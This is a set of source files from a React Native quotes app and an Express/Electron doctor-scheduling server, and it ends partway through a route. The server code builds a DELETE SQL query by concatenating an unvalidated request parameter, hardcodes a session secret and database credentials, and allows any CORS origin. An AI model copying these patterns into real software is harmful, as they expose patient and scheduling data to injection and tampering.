<|start_filename|>src/modules/bookmarks/BookmarksView.js<|end_filename|>
import React from 'react';
import PropTypes from 'prop-types';
import { NavigationEvents } from 'react-navigation';
import {
View,
Text,
Image,
TouchableOpacity,
FlatList,
} from 'react-native';
import styles from './styles';
export default function BookmarksView(props) {
const {
isDarkBg,
navigation,
bookmarksList,
onWillFocus,
} = props;
return (
<View
style={[
styles.container,
isDarkBg && styles.containerDark,
]}
>
{/** To update bookmarks list when the user navigate to the screen */}
<NavigationEvents
onWillFocus={onWillFocus}
/>
<View
style={styles.header}
>
<TouchableOpacity
onPress={() => navigation.pop()}
>
<Image
source={require('../../../assets/icons/arrow-left.png')}
style={[
styles.headerButton,
styles.headerIcon,
isDarkBg && styles.headerIconDark,
]}
resizeMode="contain"
/>
</TouchableOpacity>
<Text
style={[
styles.headerTitle,
isDarkBg && styles.headerTitleDark,
]}
>
My Favorites
</Text>
<View style={styles.headerButton} />
</View>
<FlatList
showsVerticalScrollIndicator={false}
style={styles.body}
data={bookmarksList}
keyExtractor={item => `${item.id}`}
renderItem={({ item }) => (
<TouchableOpacity
style={styles.quote}
onPress={() => navigation.navigate('Quote', { quote: item })}
>
<Text
style={[
styles.quoteText,
isDarkBg && styles.quoteTextDark,
]}
>
{item.quote}
</Text>
<Text style={styles.quoteAuthor}>{item.author}</Text>
</TouchableOpacity>
)}
ListEmptyComponent={(
<View style={styles.emptyContainer}>
<Text
style={[
styles.emptyText,
isDarkBg && styles.emptyTextDark,
]}
>
You have no favorite quotes yet
</Text>
</View>
)}
/>
</View>
);
}
BookmarksView.propTypes = {
isDarkBg: PropTypes.bool.isRequired,
navigation: PropTypes.shape({
pop: PropTypes.func.isRequired,
}).isRequired,
bookmarksList: PropTypes.arrayOf(PropTypes.shape({
quote: PropTypes.string.isRequired,
author: PropTypes.string.isRequired,
})).isRequired,
onWillFocus: PropTypes.func.isRequired,
};
<|start_filename|>src/modules/sidebar/styles.js<|end_filename|>
import EStyleSheet from 'react-native-extended-stylesheet';
import { ifIphoneX } from 'react-native-iphone-x-helper/index';
import { colors, fonts } from '../../config';
export default EStyleSheet.create({
container: {
flex: 1,
padding: 20,
paddingTop: '2rem',
backgroundColor: colors.dark,
justifyContent: 'space-between',
...ifIphoneX({
paddingTop: 50,
paddingBottom: 30,
}),
},
containerDark: {
backgroundColor: colors.light,
},
section: {
marginBottom: '2rem',
},
sectionLink: {
flexDirection: 'row',
justifyContent: 'space-between',
},
sectionLinkIcon: {
height: '1rem',
tintColor: colors.light,
},
sectionLinkIconDark: {
tintColor: colors.dark,
},
sectionHeader: {
fontFamily: fonts.primaryRegular,
fontSize: '1rem',
fontWeight: '200',
color: colors.light,
marginBottom: '0.7rem',
},
sectionHeaderDark: {
color: colors.dark,
},
sectionHeaderLight: {
color: colors.light,
},
sectionRow: {
flexDirection: 'row',
flexWrap: 'wrap',
},
sectionToggle: {
marginRight: '0.5rem',
marginVertical: '0.3rem',
},
creditsContainer: {
alignSelf: 'flex-end',
alignItems: 'flex-end',
justifyContent: 'flex-end',
paddingTop: '1rem',
},
creditsText: {
fontFamily: fonts.primaryLight,
fontSize: '1rem',
fontWeight: '200',
color: colors.gray,
marginBottom: '0.7rem',
},
});
<|start_filename|>src/modules/quotes/QuotesView.js<|end_filename|>
import React from 'react';
import {
View,
TouchableWithoutFeedback,
Animated,
TouchableOpacity,
Dimensions,
ActivityIndicator,
} from 'react-native';
import SideMenu from 'react-native-side-menu';
import Sidebar from '../sidebar/SidebarViewContainer';
import {
AnimatedTextSwitch,
AnimatedBackgroundSwitch,
AnimatedIconSwitch,
} from '../../components';
import styles from './styles';
import { colors } from '../../config';
export default function QuotesView({
currentQuote,
newQuote,
isDarkBg,
toggleBookmark,
updateContainerRef,
shareQuote,
isSharing,
isMenuOpened,
setIsMenuOpened,
navigation,
quotesLoaded,
}) {
if (!quotesLoaded) {
return (
<View style={styles.loadingContainer}>
<ActivityIndicator color={colors.light} />
</View>
);
}
return (
<SideMenu
openMenuOffset={Dimensions.get('window').width / 5 * 4}
isOpen={isMenuOpened}
onChange={setIsMenuOpened}
menuPosition="right"
menu={<Sidebar navigation={navigation} />}
bounceBackOnOverdraw={false}
animationFunction={(prop, value) => Animated.timing(prop, {
toValue: value,
friction: 8,
})}
>
<TouchableWithoutFeedback
onPress={newQuote}
>
<AnimatedBackgroundSwitch
ref={ref => updateContainerRef(ref)}
isDark={isDarkBg}
style={{
...styles.container,
}}
>
<View style={styles.header}>
<AnimatedIconSwitch
source={require('../../../assets/icons/quote.png')}
style={{
...styles.headerIcon,
...isDarkBg ? styles.footerIconLight : {},
}}
/>
{ !isSharing && (
<TouchableOpacity
onPress={() => setIsMenuOpened(true)}
>
<View>
<AnimatedIconSwitch
source={require('../../../assets/icons/menu.png')}
style={{
...styles.headerIcon,
...styles.headerIconMenu,
...isDarkBg ? styles.footerIconLight : {},
}}
/>
</View>
</TouchableOpacity>
)}
</View>
{ currentQuote && (
<View style={styles.quoteContainer}>
<AnimatedTextSwitch
style={{
...styles.quoteText,
...isDarkBg ? styles.quoteTextLight : {},
}}
>
{currentQuote && currentQuote.quote}
</AnimatedTextSwitch>
<AnimatedTextSwitch
style={{
...styles.quoteAuthor,
...isDarkBg ? styles.quoteAuthorLight : {},
}}
>
{currentQuote && currentQuote.author}
</AnimatedTextSwitch>
</View>
)}
{ !isSharing && (
<View style={styles.footer}>
<AnimatedTextSwitch
style={{
...styles.footerHelpText,
}}
>
tap for more
</AnimatedTextSwitch>
<View style={styles.footerIcons}>
<TouchableWithoutFeedback onPress={() => toggleBookmark(currentQuote)}>
<View style={styles.footerIconContainer}>
<AnimatedIconSwitch
source={currentQuote && currentQuote.bookmarked ?
require('../../../assets/icons/bookmark-filled.png') :
require('../../../assets/icons/bookmark.png')
}
style={{
...styles.footerIcon,
...isDarkBg ? styles.footerIconLight : {},
}}
/>
</View>
</TouchableWithoutFeedback>
<TouchableWithoutFeedback onPress={() => shareQuote()}>
<View style={styles.footerIconContainer}>
<AnimatedIconSwitch
source={require('../../../assets/icons/share.png')}
style={{
...styles.footerIcon,
...isDarkBg ? styles.footerIconLight : {},
}}
/>
</View>
</TouchableWithoutFeedback>
</View>
</View>
)}
</AnimatedBackgroundSwitch>
</TouchableWithoutFeedback>
</SideMenu>
);
}
<|start_filename|>src/modules/sidebar/SidebarViewContainer.js<|end_filename|>
import { connect } from 'react-redux';
import { Linking } from 'react-native';
import { compose, withHandlers } from 'recompose';
import { credentialsLink } from '../../config';
import SidebarView from './SidebarView';
import {
changeBgType,
toggleCategory,
selectAllCategories,
} from '../quotes/QuotesState';
export default compose(
connect(
state => ({
categories: state.quotes.categories,
bgType: state.quotes.bgType,
showFavorites: state.quotes.showFavorites,
isDarkBg: state.quotes.isDarkBg,
}),
dispatch => ({
changeBgType: bgType => dispatch(changeBgType(bgType)),
toggleCategory: category => dispatch(toggleCategory(category)),
selectAllCategories: () => dispatch(selectAllCategories()),
}),
),
withHandlers({
openCredits: () => () => {
Linking.canOpenURL(credentialsLink).then((supported) => {
if (supported) {
Linking.openURL(credentialsLink);
}
});
},
}),
)(SidebarView);
<|start_filename|>src/modules/quotes/QuotesState.js<|end_filename|>
/* eslint-disable no-case-declarations,no-confusing-arrow */
import _ from 'lodash';
import Realm from 'realm';
const quotesData = require('./data');
export const BG_TYPES = {
BG_WHITE: 'BG_WHITE',
BG_BLACK: 'BG_BLACK',
BG_RANDOM: 'BG_RANDOM',
};
// Realm schema of the quote
export const QuoteSchema = {
name: 'Quote',
primaryKey: 'id',
properties: {
quote: 'string',
author: 'string',
displayedTimes: { type: 'int', default: 0 },
bookmarked: { type: 'bool', default: false },
id: 'int',
category: 'string',
bgType: { type: 'string', optional: true, default: BG_TYPES.BG_WHITE },
},
};
const initialState = {
quotesLoaded: false,
currentQuote: null,
isDarkBg: false,
bgType: BG_TYPES.BG_RANDOM,
showFavorites: false,
// TODO: Put it inside Realm db
categories: {
inspire: true,
management: false,
sports: false,
life: false,
funny: false,
love: false,
art: false,
students: false,
},
};
export const LOAD_QUOTES = 'QuotesState/LOAD_QUOTES';
export const NEXT_QUOTE = 'QuotesState/NEXT_QUOTE';
export const TOGGLE_BOOKMARK = 'QuotesState/TOGGLE_BOOKMARK';
export const CHANGE_BG_TYPE = 'QuotesState/CHANGE_BG_TYPE';
export const TOGGLE_CATEGORY = 'QuotesState/TOGGLE_CATEGORY';
export const SELECT_ALL_CATEGORIES = 'QuotesState/SELECT_ALL_CATEGORIES';
/**
* Initial quotes loading into the redux store and fill Realm DB
* @returns {Function} Dispatches LOAD_QUOTES action with new quotes
*/
export function loadQuotes() {
return (dispatch) => {
Realm.open({ schema: [QuoteSchema] })
.then((realm) => {
realm.write(() => {
quotesData.quotes.forEach((quote, index) => {
realm.create('Quote', {
...quote,
author: quote.author || 'Unknown',
displayedTimes: 0,
bookmarked: false,
id: index,
});
});
});
dispatch({
type: LOAD_QUOTES,
});
});
};
}
/**
* Choosing the next quote for displaying.
* @returns {Function} Dispatches NEXT_QUOTE action with the new quote
*/
export function newQuote() {
return (dispatch, getState) => {
const state = getState();
Realm.open({ schema: [QuoteSchema] })
.then((realm) => {
// Get all quotes
const quotes = realm.objects('Quote');
// Create realm query with selected categories
const filterExpression = Object.keys(state.quotes.categories)
.reduce((accumulator, currentValue) => {
if (state.quotes.categories[currentValue]) {
if (accumulator.length === 0) {
return `category = "${currentValue}"`;
}
return `${accumulator} OR category = "${currentValue}"`;
}
return accumulator;
}, '');
// Pick the next quote sorted by displayed times
const nextQuote = quotes.filtered(filterExpression).sorted('displayedTimes')[0];
realm.write(() => {
nextQuote.displayedTimes += 1;
dispatch({
type: NEXT_QUOTE,
payload: {
nextQuote: JSON.parse(JSON.stringify(nextQuote)),
index: nextQuote.id,
},
});
});
realm.close();
});
};
}
export function changeBgType(newBgType) {
return {
type: CHANGE_BG_TYPE,
payload: newBgType,
};
}
export function toggleBookmark(quoteToBookmark) {
return (dispatch, getState) => {
const state = getState();
dispatch({
type: TOGGLE_BOOKMARK,
});
Realm.open({ schema: [QuoteSchema] })
.then((realm) => {
const quote = realm.objects('Quote').filtered(`id = ${quoteToBookmark.id}`)[0];
realm.write(() => {
quote.bookmarked = !quote.bookmarked;
quote.bgType = state.quotes.isDarkBg ? BG_TYPES.BG_BLACK : BG_TYPES.BG_WHITE;
});
realm.close();
});
};
}
export function toggleCategory(category) {
return {
type: TOGGLE_CATEGORY,
payload: category,
};
}
export function selectAllCategories() {
return {
type: SELECT_ALL_CATEGORIES,
};
}
export default function QuotesReducer(state = initialState, action) {
switch (action.type) {
case LOAD_QUOTES:
return {
...state,
quotesLoaded: true,
};
case NEXT_QUOTE:
return {
...state,
currentQuote: action.payload.nextQuote,
isDarkBg: state.bgType === BG_TYPES.BG_RANDOM ? !!_.random(0, 1) : state.isDarkBg,
};
case TOGGLE_BOOKMARK:
return {
...state,
currentQuote: {
...state.currentQuote,
bookmarked: !state.currentQuote.bookmarked,
},
};
case CHANGE_BG_TYPE:
return {
...state,
bgType: action.payload,
// eslint-disable-next-line no-nested-ternary
isDarkBg: action.payload === BG_TYPES.BG_WHITE ? false :
(action.payload === BG_TYPES.BG_RANDOM ? state.isDarkBg : true),
};
case TOGGLE_CATEGORY:
const selectedCategoriesCount =
// All categories
Object.keys(state.categories)
// Filtered by selected
.filter(c => state.categories[c]);
const isAllCategoriesSelected =
selectedCategoriesCount.length ===
Object.keys(state.categories).length;
const isOnlyOneCategorySelected = selectedCategoriesCount.length === 1;
// If the user tries to unselect the only selected category
if (isOnlyOneCategorySelected && state.categories[action.payload]) {
return {
...state,
};
}
return {
...state,
categories:
// If all categories selected
isAllCategoriesSelected ?
{
// Mark all as unselected
...Object.keys(state.categories).reduce((a, c) => ({ ...a, [c]: false }), {}),
// Except this one
[action.payload]: true,
} :
{
...state.categories,
[action.payload]: !state.categories[action.payload],
}
,
};
case SELECT_ALL_CATEGORIES:
return {
...state,
categories: {
inspire: true,
management: true,
sports: true,
life: true,
funny: true,
love: true,
art: true,
students: true,
},
};
default:
return state;
}
}
<|start_filename|>src/modules/sidebar/SidebarView.js<|end_filename|>
import React from 'react';
import {
View,
Text,
TouchableOpacity,
} from 'react-native';
import styles from './styles';
import {
ToggleButton,
AnimatedBackgroundSwitch,
AnimatedIconSwitch,
} from '../../components';
import {
BG_TYPES,
} from '../quotes/QuotesState';
export default function Sidebar(props) {
const {
categories,
bgType,
changeBgType,
toggleCategory,
selectAllCategories,
isDarkBg,
navigation,
openCredits,
} = props;
const hasUnselectedCategory = Object.keys(categories).filter(c => !categories[c]).length > 0;
return (
<AnimatedBackgroundSwitch
style={styles.container}
isDark={!isDarkBg}
>
<View>
<TouchableOpacity
onPress={() => navigation.navigate('Bookmarks')}
style={[styles.section, styles.sectionLink]}
>
<Text
style={[
styles.sectionHeader,
isDarkBg && styles.sectionHeaderDark,
]}
>
My Favorites
</Text>
<AnimatedIconSwitch
isDark={isDarkBg}
source={require('../../../assets/icons/arrow-right.png')}
style={{
...styles.sectionLinkIcon,
...isDarkBg ? styles.sectionLinkIconDark : {},
}}
/>
</TouchableOpacity>
<View style={styles.section}>
<Text
style={[
styles.sectionHeader,
isDarkBg && styles.sectionHeaderDark,
]}
>
Background Color
</Text>
<View style={styles.sectionRow}>
<ToggleButton
isDark={isDarkBg}
style={styles.sectionToggle}
selected={bgType === BG_TYPES.BG_WHITE}
onPress={() => changeBgType(BG_TYPES.BG_WHITE)}
>
White
</ToggleButton>
<ToggleButton
isDark={isDarkBg}
style={styles.sectionToggle}
selected={bgType === BG_TYPES.BG_BLACK}
onPress={() => changeBgType(BG_TYPES.BG_BLACK)}
>
Black
</ToggleButton>
<ToggleButton
isDark={isDarkBg}
style={styles.sectionToggle}
selected={bgType === BG_TYPES.BG_RANDOM}
onPress={() => changeBgType(BG_TYPES.BG_RANDOM)}
>
Random
</ToggleButton>
</View>
</View>
<View style={styles.section}>
<Text
style={[
styles.sectionHeader,
isDarkBg && styles.sectionHeaderDark,
]}
>
Categories
</Text>
<View style={styles.sectionRow}>
<ToggleButton
isDark={isDarkBg}
style={styles.sectionToggle}
selected={!hasUnselectedCategory}
onPress={selectAllCategories}
>
All Categories
</ToggleButton>
{ Object.keys(categories).sort().map(category => (
<ToggleButton
isDark={isDarkBg}
key={category}
style={styles.sectionToggle}
selected={hasUnselectedCategory && categories[category]}
onPress={() => toggleCategory(category)}
>
{category}
</ToggleButton>
))}
</View>
</View>
</View>
<View style={styles.creditsContainer}>
<TouchableOpacity onPress={openCredits}>
<Text
style={styles.creditsText}
>
credits
</Text>
</TouchableOpacity>
</View>
</AnimatedBackgroundSwitch>
);
}
<|start_filename|>src/components/AnimatedTextSwitch.js<|end_filename|>
import React from 'react';
import {
Animated,
Easing,
} from 'react-native';
import config from '../config';
/**
* Component to animate TextChange with opacity effect.
* It fades the previous text to opacity 0, changes text and animates opacity to 1 then.
*/
class AnimatedTextSwitch extends React.Component {
constructor(props) {
super(props);
this.state = {
previousText: props.children,
textOpacity: new Animated.Value(1),
textColor: props.style.color,
};
}
componentWillReceiveProps(newProps) {
const newText = newProps.children;
if (newText !== this.state.previousText ||
this.state.textColor !== newProps.style.color
) {
Animated.timing(
this.state.textOpacity,
{
toValue: 0,
duration: config.defaultAnimationDuration,
easing: Easing.in(Easing.sin),
},
).start(() => {
this.setState({
previousText: newText,
textColor: newProps.style.color,
}, () => {
Animated.timing(
this.state.textOpacity,
{
toValue: 1,
duration: config.defaultAnimationDuration,
easing: Easing.in(Easing.sin),
},
).start();
});
});
}
}
render() {
return (
<Animated.Text
{...this.props}
style={{
...this.props.style,
opacity: this.state.textOpacity,
color: this.state.textColor,
}}
>
{this.state.previousText}
</Animated.Text>
);
}
}
export default AnimatedTextSwitch;
<|start_filename|>src/components/ToggleButton.js<|end_filename|>
import React from 'react';
import PropTypes from 'prop-types';
import {
TouchableOpacity,
Text,
} from 'react-native';
import EStyleSheet from 'react-native-extended-stylesheet';
import { colors, fonts } from '../config';
export default function ToggleButton(props) {
const { selected, children, isDark } = props;
return (
<TouchableOpacity
{...props}
style={[
styles.button,
isDark && styles.buttonDark,
selected && styles.buttonSelected,
selected && isDark && styles.buttonSelectedDark,
props.style,
]}
>
<Text
style={[
styles.caption,
selected && styles.captionSelected,
selected && isDark && styles.captionSelectedDark,
]}
>
{children}
</Text>
</TouchableOpacity>
);
}
ToggleButton.propTypes = {
selected: PropTypes.bool,
children: PropTypes.string.isRequired,
};
ToggleButton.defaultProps = {
selected: false,
};
const styles = EStyleSheet.create({
button: {
paddingHorizontal: '0.8rem',
paddingVertical: '0.6rem',
borderRadius: '1.5rem',
backgroundColor: colors.flatDarkGray,
},
buttonDark: {
backgroundColor: colors.lightGray,
},
buttonSelected: {
backgroundColor: colors.light,
},
buttonSelectedDark: {
backgroundColor: colors.darkGray,
},
caption: {
fontFamily: fonts.primaryLight,
fontSize: '0.8rem',
fontWeight: '300',
color: colors.gray,
},
captionSelected: {
color: colors.darkGray,
},
captionSelectedDark: {
color: colors.light,
},
});
<|start_filename|>src/components/AnimatedIconSwitch.js<|end_filename|>
import React from 'react';
import {
Animated,
Easing,
} from 'react-native';
import config from '../config';
/**
* This component animates icon switch. It could animate opacity, tintColor and icon source.
*/
class AnimatedIconSwitch extends React.Component {
constructor(props) {
super(props);
this.state = {
iconOpacity: new Animated.Value(1),
tintColor: props.style.tintColor,
source: props.source,
};
}
componentWillReceiveProps(newProps) {
const isTintColorChanging = newProps.style.tintColor !== this.state.tintColor;
const isSourceChanging = this.state.source !== newProps.source;
if (isTintColorChanging || isSourceChanging) {
Animated.timing(
this.state.iconOpacity,
{
toValue: 0,
duration: config.defaultAnimationDuration / (isTintColorChanging ? 1 : 3),
easing: Easing.in(Easing.sin),
},
).start(() => {
this.setState({
tintColor: newProps.style.tintColor,
source: newProps.source,
}, () => {
Animated.timing(
this.state.iconOpacity,
{
toValue: 1,
duration: config.defaultAnimationDuration,
easing: Easing.in(Easing.sin),
},
).start();
});
});
}
}
render() {
return (
<Animated.Image
resizeMode="contain"
{...this.props}
source={this.state.source}
style={{
...this.props.style,
opacity: this.state.iconOpacity,
tintColor: this.state.tintColor,
}}
/>
);
}
}
export default AnimatedIconSwitch;
<|start_filename|>src/components/AnimatedBackgroundSwitch.js<|end_filename|>
import React from 'react';
import PropTypes from 'prop-types';
import {
Animated,
Easing,
} from 'react-native';
import config from '../config';
/**
* Component that animates background color change from light to dark.
* @param {boolean} isDark Determines the next color (is it dark or not)
*/
class AnimatedBackgroundSwitch extends React.Component {
static propTypes = {
isDark: PropTypes.bool.isRequired,
};
constructor(props) {
super(props);
this.state = {
bgColor: new Animated.Value(props.isDark ? 0 : 1),
isDark: props.isDark,
};
}
componentWillReceiveProps(newProps) {
if (this.state.isDark !== newProps.isDark) {
Animated.timing(
this.state.bgColor,
{
toValue: this.state.isDark ? 1 : 0,
duration: config.defaultAnimationDuration * 2,
easing: Easing.in(Easing.sin),
},
).start(() => {
this.setState({
isDark: newProps.isDark,
});
});
}
}
render() {
// Interpolating color to make a smooth transition
const color = this.state.bgColor.interpolate({
inputRange: [0, 1],
outputRange: ['rgba(0, 0, 0, 1.0)', 'rgba(255, 255, 255, 1.0)'],
});
return (
<Animated.View
{...this.props}
style={{
...this.props.style,
backgroundColor: color,
}}
/>
);
}
}
export default AnimatedBackgroundSwitch;
<|start_filename|>src/modules/bookmarks/styles.js<|end_filename|>
import EStyleSheet from 'react-native-extended-stylesheet';
import { ifIphoneX } from 'react-native-iphone-x-helper/index';
import { colors, fonts } from '../../config';
export default EStyleSheet.create({
container: {
flex: 1,
padding: 20,
paddingTop: '2rem',
backgroundColor: colors.light,
...ifIphoneX({
paddingTop: 50,
paddingBottom: 50,
}),
},
containerDark: {
backgroundColor: colors.dark,
},
header: {
flexDirection: 'row',
alignItems: 'center',
justifyContent: 'space-between',
paddingBottom: '1rem',
},
headerButton: {
width: '1.5rem',
},
headerIcon: {
tintColor: colors.dark,
height: '1rem',
},
headerIconDark: {
tintColor: colors.light,
},
headerTitle: {
fontSize: '1rem',
fontWeight: '200',
fontFamily: fonts.primaryLight,
color: colors.dark,
},
headerTitleDark: {
color: colors.light,
},
quote: {
paddingVertical: '1.5rem',
},
body: {},
quoteText: {
fontFamily: fonts.primaryLight,
fontWeight: '200',
fontSize: '1.3rem',
color: colors.dark,
},
quoteTextDark: {
color: colors.light,
},
quoteAuthor: {
fontFamily: fonts.primaryLight,
fontWeight: '200',
fontSize: '0.8rem',
color: colors.gray,
marginTop: '0.8rem',
},
emptyContainer: {
flex: 1,
alignItems: 'center',
justifyContent: 'center',
padding: '2rem',
},
emptyText: {
fontFamily: fonts.primaryLight,
fontWeight: '200',
fontSize: '0.8rem',
color: colors.dark,
textAlign: 'center',
},
emptyTextDark: {
color: colors.light,
},
});
<|start_filename|>src/modules/navigation/Navigator.js<|end_filename|>
import {
createStackNavigator,
} from 'react-navigation';
import Quotes from '../quotes/QuotesViewContainer';
import Bookmarks from '../bookmarks/BookmarksViewContainer';
import Quote from '../quote/QuoteViewContainer';
export default createStackNavigator({
Quotes,
Bookmarks,
Quote,
}, {
headerMode: 'none',
initialRouteName: 'Quotes',
});
<|start_filename|>src/redux/store.js<|end_filename|>
import { applyMiddleware, createStore, compose } from 'redux';
import { persistStore, persistReducer } from 'redux-persist';
import storage from 'redux-persist/lib/storage';
import middleware from './middleware';
import reducer from './reducer';
const enhancers = [
applyMiddleware(...middleware),
];
/* Enable redux dev tools only in development.
* We suggest using the standalone React Native Debugger extension:
* https://github.com/jhen0409/react-native-debugger
*/
/* eslint-disable no-undef */
const composeEnhancers = (
__DEV__ &&
typeof (window) !== 'undefined' &&
window.__REDUX_DEVTOOLS_EXTENSION_COMPOSE__
) || compose;
/* eslint-enable no-undef */
const enhancer = composeEnhancers(...enhancers);
const persistConfig = {
key: 'root',
storage,
};
const persistedReducer = persistReducer(persistConfig, reducer);
export const store = createStore(
persistedReducer,
{},
enhancer,
);
export const persistor = persistStore(store);
<|start_filename|>App.js<|end_filename|>
import { Provider } from 'react-redux';
import React from 'react';
import codePush from 'react-native-code-push';
import { View, ActivityIndicator, StyleSheet } from 'react-native';
import { PersistGate } from 'redux-persist/integration/react';
import { store, persistor } from './src/redux/store';
import Navigator from './src/modules/navigation/Navigator';
function App() {
return (
<Provider store={store}>
<PersistGate
loading={(
<View style={styles.container}>
<ActivityIndicator color="#FFFFFF" />
</View>
)}
persistor={persistor}
>
<Navigator />
</PersistGate>
</Provider>
);
}
const styles = StyleSheet.create({
container: {
flex: 1,
justifyContent: 'center',
alignItems: 'center',
backgroundColor: 'black',
},
});
export default codePush(App);
| gaykov/minimal-quotes |
<|start_filename|>clean_server/resources/app/models/User.js<|end_filename|>
var Sequelize = require('sequelize')
//Sequelize needed for sequelize strings
//attributes here are used when
//we make our connection in
//models.js
var attributes = {
username: {
type: Sequelize.STRING,
allowNull: false,
unique: true,
validate: {
is: /^[a-z0-9\_\-]+$/i,
}
},
email: {
//defines email as a string value
type: Sequelize.STRING,
validate: {
isEmail: true
}
},
first: {
type: Sequelize.STRING,
},
last: {
type: Sequelize.STRING,
},
password: {
type: Sequelize.STRING,
},
salt: {
type: Sequelize.STRING
}
,
admin: {
type: Sequelize.STRING
},
city:{
type: Sequelize.STRING
},
specialty:{
type: Sequelize.STRING
}
}
var options = {
//just ensures table names do not change
freezeTableName: true
}
module.exports.attributes = attributes
module.exports.options = options
<|start_filename|>clean_server/resources/app/setupPg.js<|end_filename|>
const pg = require('pg');
const connectionString = process.env.DATABASE_URL || 'postgres://localhost:5432/doctor';
//need to create a doctor db
const client = new pg.Client(connectionString);
client.connect();
const query = client.query(
'CREATE TABLE operations( pkid serial NOT NULL, userid integer, start time without time zone, end1 time without time zone, activity character varying, yearmonthday character varying, color character varying, pfirst character varying, plast character varying, dfirst character varying, dlast character varying, requestid integer, CONSTRAINT operations_pkey PRIMARY KEY (pkid))');
query.on('end', () => { client.end(); });
const query2 = client.query(
'CREATE TABLE request( pkid serial NOT NULL, stime time without time zone, etime time without time zone, requestid integer, yearmonthday character varying, docid integer, userid integer, activity character varying, first character varying, last character varying, dfirst character varying, dlast character varying, update character varying, CONSTRAINT request_pkey PRIMARY KEY (pkid))');
query2.on('end', () => { client.end(); });
<|start_filename|>clean_server/resources/app/setupPassport.js<|end_filename|>
var passport = require('passport'),
LocalStrategy = require('passport-local').Strategy,
bcrypt = require('bcrypt'),
Model = require('./models/models.js')
module.exports = function(app) {
//here we are adding the passport middleware to express
app.use(passport.initialize()) //needed to support express
app.use(passport.session())// for express
//when we use 'local' we are referring to this local strategy
passport.use(new LocalStrategy(
function(username, password, done) {
//checks if there is a user with that username
Model.User.findOne({
where: {
'username': username
}
}).then(function (user) { //gets called upon when findOne is fullfilled
if (user == null) {
return done(null, false, { message: 'Incorrect credentials.' })
}
var hashedPassword = <PASSWORD>.hashSync(password, user.salt)
//hashing algo will always create same output when given the same input.
//you cannot go backwords from a hashed string to uncover original
//string.
//salt protects from
//rainbow tables (table containing common passwords and their hashes)
//works because rainbow table does not know the salt
//salt does not offer protection from
//bruteforce or dictionary (focus on hashing common passwords) attacks
//check if password matched password in DB
if (user.password === hashedPassword) {
return done(null, user)
}
//if not return invalid credentials
return done(null, false, { message: 'Incorrect credentials.' })
})
}
))
passport.serializeUser(function(user, done) {
done(null, user.id)
})
passport.deserializeUser(function(id, done) {
Model.User.findOne({
where: {
'id': id
}
}).then(function (user) {
if (user == null) {
done(new Error('Wrong user id.'))
}
done(null, user)
})
})
}
<|start_filename|>scurrent_clean/app/src/renderer/routes.js<|end_filename|>
export default [
{
path: '/signup',
name: 'signup',
component: require('components/signup')
},
{
path: '/calendar',
name: 'calendar',
component: require('components/calendar')
},
{
path: '/',
name: 'login',
component: require('components/login')
},
]
<|start_filename|>clean_server/index.js<|end_filename|>
const express = require('./resources/app/servertest3.js'); //
const electron = require('electron')
var win;
const {app,BrowserWindow} = electron
app.on('ready', () => {
win = new BrowserWindow({width:1035, height:825})
// let win = new BrowserWindow({width:1035, height:825})
//win.loadURL(`file://${__dirname}/index.html`)
win.loadURL('http://localhost:3000/display4');
win.focus();
});
<|start_filename|>clean_server/resources/app/sequelize.js<|end_filename|>
//exports sequalize string
var Sequelize = require('sequelize'),
sequelize = new Sequelize('postgres://daniel:admin@localhost:5432/seq')
module.exports = sequelize
<|start_filename|>clean_server/resources/app/setupHandlebars.js<|end_filename|>
var ehandlebars = require('express-handlebars')
module.exports = function(app) {
var hbs = ehandlebars.create({
defaultLayout: 'app',
helpers: {
section: function(name, options) {
if (!this._sections) this._sections = {}
this._sections[name] = options.fn(this)
return null
}
}
})
app.engine('handlebars', hbs.engine)
app.set('view engine', 'handlebars')
}
<|start_filename|>clean_server/resources/app/servertest3.js<|end_filename|>
var express = require('express'),
cors = require('cors'),
//we use Express, Express is the standard server
//framework for Node
app = express(),
setupHandlebars = require('./setupHandlebars.js')(app),
setupPassport = require('./setupPassport'),
flash = require('connect-flash'),
appRouter = require('./routers/appRouter.js')(express),
session = require('express-session'),
bodyParser = require('body-parser'),
cookieParser = require('cookie-parser'),
multer = require('multer'),
pg = require("pg"),
jsonParser = bodyParser.json()
var yearmonthday;
var port = process.env.PORT || 8080
app.use(cors());
app.use(cookieParser())
app.use(session({ secret: '4564f6s4fdsfdfd', resave: false, saveUninitialized: false }))
app.use('/styles', express.static(__dirname + '/styles'))
app.use(flash())
app.use(function(req, res, next) {
res.locals.errorMessage = req.flash('error')
next()
});
app.use(jsonParser)
app.use(bodyParser.urlencoded({
extended: true
}))
setupPassport(app)
app.use('/', appRouter)
var pkid = 0;
//When you have app.use(object) instead of
// app.use(/thisPath) the app.use(object) runs
// with everyrequest, whereas the app.use(/thisPath)
// only runs when that path is requested
// so app.use(object) is baisically middleware
app.use(bodyParser.json());
//body-parser module parses the JSON, submitted using HTTP POST request.
app.use(bodyParser.urlencoded({extended: true}));
app.use(express.static(__dirname + '/public')); //needed to serve css
app.set('views', __dirname+'/views');
app.set('view engine', 'ejs');
//database objects
var pes = {
user: 'postgres', //env var: PGUSER used to be daniel
database: 'pes2013restore', //env var: PGDATABASE
password: '<PASSWORD>', //env var: PGPASSWORD
host: 'localhost', // Server hosting the postgres database
port: 5432, //env var: PGPORT
max: 10, // max number of clients in the pool
idleTimeoutMillis: 30000, // how long a client is allowed to remain idle before being closed
};
var doctor = {
user: 'postgres', //env var: PGUSER used to be daniel
database: 'doctor', //env var: PGDATABASE
password: '<PASSWORD>', //env var: PGPASSWORD
host: 'localhost', // Server hosting the postgres database
port: 5432, //env var: PGPORT
max: 10, // max number of clients in the pool
idleTimeoutMillis: 30000, // how long a client is allowed to remain idle before being closed
}
var doctorUsers = {//new
user: 'postgres', //env var: PGUSER
database: 'seq', //env var: PGDATABASE
host: 'localhost', // Server hosting the postgres database
port: 5432, //env var: PGPORT
max: 10, // max number of clients in the pool
idleTimeoutMillis: 30000, // how long a client is allowed to remain idle before being closed
}//new
var curr_letters = "";
//here we use pg module to interface between
//Node and our PostgreSQL database
var client = new pg.Client(pes);
var doc = new pg.Client(doctor);
var users = new pg.Client(doctorUsers);
doc.connect();
users.connect();
client.connect();
//used to deal with CORS
// A user makes a cross-origin HTTP request
//when it requests a resource from a different domain, protocol, or port
//than the one from which the current document originated.
app.use(function(req, res, next) {
res.header("Access-Control-Allow-Origin", "*");
res.header("Access-Control-Allow-Headers", "Origin, X-Requested-With, Content-Type, Accept");
next();
});
app.post('/what', function(req,res){
res.send(req.query.username);
});
//there is a table for requests and for operations
//deletes a specific request
app.post('/removeRequest', function(req,res){
console.log("reached remove request")
var pkid = req.query.pkid;
doc.query("DELETE FROM request WHERE pkid="+pkid+"");
